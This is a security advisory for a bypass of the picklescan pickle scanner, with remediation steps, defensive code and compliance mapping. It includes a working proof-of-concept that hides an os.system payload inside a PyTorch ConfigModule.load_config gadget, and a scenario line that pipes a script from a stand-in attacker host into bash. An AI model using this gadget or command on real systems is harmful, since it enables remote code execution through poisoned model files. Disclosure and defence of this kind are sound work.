GHSA-vv6j-3g6g-2pvj: picklescan: PyTorch gadget bypasses scanner, enables RCE

GHSA-vv6j-3g6g-2pvj MEDIUM
Published August 22, 2025
CISO Take

Any ML pipeline using picklescan <= 0.0.27 as a security gate before loading pickle files is exposed to a false-negative bypass: malicious models crafted with a PyTorch gadget pass scanning as safe but execute arbitrary code on load. Upgrade picklescan to 0.0.28 immediately and treat any pickle files scanned with the vulnerable version as unverified. Consider mandating the safetensors format for all new model artifacts.

Risk Assessment

Rated Medium by the advisory, but operationally HIGH for organizations using picklescan as a security control in MLOps pipelines. The attack requires no privileges or user interaction beyond the normal act of loading a model. The false-negative nature of the bypass is particularly dangerous: security teams hold a positive confirmation artifact ('scan passed') that provides false assurance. Model registries, CI/CD pipelines, and shared model repositories are the primary exposure surface.

Affected Systems

Package: picklescan
Ecosystem: pip
Vulnerable range: <= 0.0.27
Patched version: 0.0.28

If you use any version of picklescan up to 0.0.27 to vet pickle files, you are affected.

Severity & Risk

CVSS 3.1
N/A
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
Moderate

Recommended Action

5 steps
  1. Patch: Upgrade picklescan to >= 0.0.28 immediately — this is the only fix (a version-gate sketch follows this list).

  2. Audit: Identify all pickle files scanned with vulnerable versions in the past 90 days; treat as untrusted and re-scan or replace.

  3. Defense-in-depth: Do not rely on a single scanner — add network egress monitoring on training/serving hosts to detect RCE callback attempts.

  4. Format migration: Prefer safetensors or ONNX formats over raw pickle for model serialization; block .pkl/.pt files from external sources where possible (see the safetensors sketch after this list).

  5. Sandbox: Load untrusted models in isolated environments (container with no network, restricted syscalls via seccomp) before promotion to production pipelines.
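As a concrete guard for steps 1 and 2, the following is a minimal sketch of a CI check that refuses to proceed while a vulnerable picklescan build is installed. The version threshold comes from this advisory; the check itself is illustrative and assumes a plain X.Y.Z version string.

```python
# Fail fast if the environment still carries a picklescan build vulnerable
# to GHSA-vv6j-3g6g-2pvj (anything below 0.0.28).
from importlib.metadata import PackageNotFoundError, version

MIN_SAFE = (0, 0, 28)

try:
    installed = tuple(int(part) for part in version("picklescan").split("."))
except PackageNotFoundError:
    raise SystemExit("picklescan is not installed in this environment")

if installed < MIN_SAFE:
    version_str = ".".join(map(str, installed))
    raise SystemExit(
        f"picklescan {version_str} is vulnerable to GHSA-vv6j-3g6g-2pvj; "
        "upgrade to >= 0.0.28 before trusting any scan result"
    )
```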
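For step 4, a minimal sketch of exporting and reloading a checkpoint with safetensors instead of pickle. It assumes the safetensors and torch packages are installed; tensor names and file paths are examples only.

```python
import torch
from safetensors.torch import load_file, save_file

# Persist only the tensors; safetensors stores raw data plus metadata,
# so deserialization never executes arbitrary Python code.
state = {"weight": torch.zeros(2, 2), "bias": torch.zeros(2)}
save_file(state, "model.safetensors")

# Loading returns plain tensors keyed by name.
restored = load_file("model.safetensors")
assert restored["weight"].shape == (2, 2)
```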

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Art.9 - Risk management system for high-risk AI
ISO 42001
6.1.2 - AI risk assessment; 8.4 - AI system supply chain
NIST AI RMF
GOVERN-6.1 - Policies and procedures are in place for AI supply chain risk management; MANAGE-2.2 - Mechanisms are in place to sustain treatment of AI risk
OWASP LLM Top 10
LLM05:2025 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is GHSA-vv6j-3g6g-2pvj?

GHSA-vv6j-3g6g-2pvj is a scanner-bypass vulnerability in picklescan <= 0.0.27: a malicious pickle file that wraps its payload in the PyTorch torch.utils._config_module.ConfigModule.load_config gadget passes scanning as safe but executes arbitrary code when loaded. The issue is fixed in picklescan 0.0.28; any pickle files vetted only by a vulnerable version should be treated as unverified.

Is GHSA-vv6j-3g6g-2pvj actively exploited?

No confirmed active exploitation of GHSA-vv6j-3g6g-2pvj has been reported, but organizations should still patch proactively.

How to fix GHSA-vv6j-3g6g-2pvj?

1. Patch: Upgrade picklescan to >= 0.0.28 immediately — this is the only fix.
2. Audit: Identify all pickle files scanned with vulnerable versions in the past 90 days; treat as untrusted and re-scan or replace.
3. Defense-in-depth: Do not rely on a single scanner — add network egress monitoring on training/serving hosts to detect RCE callback attempts.
4. Format migration: Prefer safetensors or ONNX formats over raw pickle for model serialization; block .pkl/.pt files from external sources where possible.
5. Sandbox: Load untrusted models in isolated environments (container with no network, restricted syscalls via seccomp) before promotion to production pipelines.

What systems are affected by GHSA-vv6j-3g6g-2pvj?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, model serving, MLOps CI/CD pipelines, model registries, data science workbenches.

What is the CVSS score for GHSA-vv6j-3g6g-2pvj?

No CVSS score has been assigned yet.

Technical Details

NVD Description

Summary: The gadget abuses torch.utils._config_module.ConfigModule.load_config, a PyTorch library function, to execute a nested pickle payload.

Details: The attack proceeds in two steps. First, the attacker crafts a payload whose __reduce__ method returns a call to ConfigModule.load_config with a second, malicious pickle embedded as its argument. Then, after Picklescan reports the file as safe (the library does not flag load_config as a dangerous function), the victim calls pickle.load() on the file and the nested payload executes, resulting in remote code execution.

PoC:

```python
import os
import pickle

from torch.utils._config_module import ConfigModule


class Evil:
    def __reduce__(self):
        # Inner payload: runs an arbitrary shell command on unpickling.
        return (os.system, ('whoami',))


class EvilTorchUtilsConfigModuleLoadConfig:
    def __reduce__(self):
        # Outer gadget: hides the inner payload behind ConfigModule.load_config,
        # which picklescan <= 0.0.27 does not flag as dangerous.
        evil_payload = pickle.dumps(Evil())
        return ConfigModule.load_config, (None, evil_payload)
```

Impact: Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. What is the impact? Attackers can embed malicious code in a pickle file that remains undetected by the scanner but executes when the file is loaded. Supply chain attack: attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.

Credits: https://github.com/FredericDT, https://github.com/Qhaoduoyu
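To see the false negative end to end, the gadget can be written to disk like any other checkpoint. The snippet below continues from the PoC classes defined above; the filename is illustrative.

```python
# Serialize the gadget to a file that looks like an ordinary pickled model.
with open("model.pkl", "wb") as fh:
    fh.write(pickle.dumps(EvilTorchUtilsConfigModuleLoadConfig()))

# picklescan <= 0.0.27 reports no dangerous globals for model.pkl, yet
# pickle.load() on the same file executes `whoami` via ConfigModule.load_config.
```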

Exploitation Scenario

Attacker publishes a PyTorch model to a public registry (e.g., Hugging Face). The model's pickle payload wraps `os.system('curl attacker.com/shell.sh | bash')` inside a `ConfigModule.load_config` reduce call. An automated MLOps pipeline downloads the model, runs `picklescan model.pkl` — scan exits clean. The pipeline calls `torch.load('model.pkl')` as part of validation or benchmarking. The payload executes with the pipeline's permissions, granting the attacker a reverse shell on training infrastructure with potential access to proprietary training data, API keys in environment variables, and lateral movement within the ML platform.
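As additional defense-in-depth in such a pipeline (not a substitute for upgrading picklescan), recent PyTorch releases can load checkpoints with a restricted unpickler that rejects arbitrary callables, including the ConfigModule.load_config gadget. A minimal sketch, with an illustrative filename:

```python
import torch

try:
    # weights_only=True restricts unpickling to tensors and other allow-listed
    # types; a disallowed global such as ConfigModule.load_config raises
    # instead of executing.
    state = torch.load("model.pkl", weights_only=True)
except Exception as exc:
    raise SystemExit(f"Refusing to load untrusted checkpoint: {exc}")
```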

Timeline

Published
August 22, 2025
Last Modified
August 22, 2025
First Seen
March 24, 2026

Related Vulnerabilities